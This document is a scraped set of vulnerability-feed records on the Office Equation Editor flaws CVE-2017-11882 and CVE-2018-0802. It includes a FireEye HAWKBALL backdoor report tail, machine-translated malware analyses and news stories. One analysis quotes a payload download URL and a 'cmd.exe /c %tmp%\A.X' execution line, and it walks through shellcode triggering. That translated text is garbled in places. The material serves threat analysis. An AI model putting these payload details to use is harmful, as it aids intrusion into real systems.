\nFigure 18: Retrieve drive information\n\nThe information is stored in the following format for each drive:\n\n**Format = \"%d+%d+%d+%d;\"**\n\nExample: \"8+512+6460870+16751103;\"\n\nThe information for all the available drives is combined and sent to the server using an operation similar to Figure 14.\n\n#### Anti-Debugging Tricks\n\n##### Debugger Detection With PEB\n\nThe malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.\n\n \nFigure 19: Retrieve value from PEB\n\n##### NtQueryInformationProcess\n\nThe malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:\n\n * Passing value 0x7 to ProcessInformationClass:\n\n \nFigure 20: ProcessDebugPort verification\n\n * Passing value 0x1E to ProcessInformationClass:\n\n \nFigure 21: ProcessDebugFlags verification\n\n * Passing value 0x1F to ProcessInformationClass:\n\n \nFigure 22: ProcessDebugObject\n\n#### Conclusion\n\nHAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Indicators of Compromise (IOC)\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \nAC0EAC22CE12EAC9EE15CA03646ED70C\n\n| \n\nDoc.rtf \n \nD90E45FBF11B5BBDCA945B24D155A4B2\n\n| \n\nhh14980443.wll \n \n#### Network Indicators\n\n * 149.28.182[.]78:443\n * 149.28.182[.]78:80\n * http://149.28.182[.]78/?t=0&amp;&amp;s=0&amp;&amp;p=wGH^69&amp;&amp;k=&lt;tick_count&gt;\n * http://149.28.182[.]78/?e=0&amp;&amp;t=0&amp;&amp;k=&lt;tick_count&gt;\n * http://149.28.182[.]78/?e=0&amp;&amp;t=&lt;int_xor_key&gt;&amp;&amp;k=&lt;tick_count&gt;\n * Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)\n\n#### FireEye Detections\n\n**MD5**\n\n| \n\n**Product**\n\n| \n\n**Signature**\n\n| \n\n**Action** \n \n---|---|---|--- \n \nAC0EAC22CE12EAC9EE15CA03646ED70C\n\n| \n\nFireEye Email Security\n\nFireEye Network Security\n\nFireEye Endpoint Security\n\n| \n\nFE_Exploit_RTF_EQGEN_7\n\nExploit.Generic.MVX\n\n| \n\nBlock \n \nD90E45FBF11B5BBDCA945B24D155A4B2\n\n| \n\nFireEye Email Security\n\nFireEye Network Security\n\nFireEye Endpoint Security\n\n| \n\nMalware.Binary.Dll\n\nFE_APT_Backdoor_Win32_HawkBall_1\n\nAPT.Backdoor.Win.HawkBall\n\n| \n\nBlock \n \n#### Acknowledgement\n\nThank you to Matt Williams for providing reverse engineering support.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T15:00:00", "type": "fireeye", "title": "Government Sector in Central Asia Targeted With New HAWKBALL Backdoor\nDelivered via Microsoft Office Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-06-05T15:00:00", "id": "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "href": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-12-02T18:49:48", "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-02T00:00:00", "type": "myhack58", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-25T17:29:45", "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-25T00:00:00", "type": "myhack58", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T07:34:00", "type": "thn", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-05-03T16:14:45", "id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:17", "description": "[](<https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png>)\n\nIf you think that only CPU updates that address this year's major security flaws\u2014[Meltdown and Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you are advised to grab immediately, there are a handful of major security flaws that you should pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office related that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. \n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, is already being targeted in the wild by several threat actor groups in the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. \n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. \n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for MAC, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also addressed by the company. The vulnerability does not allow some versions Outlook for Mac to handle the encoding and display of email addresses properly, causing antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid. \n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet. \n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, simply head on to Settings \u2192 Update &amp; security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "cvss3": {}, "published": "2018-01-09T19:35:00", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "modified": "2018-01-11T07:11:17", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the 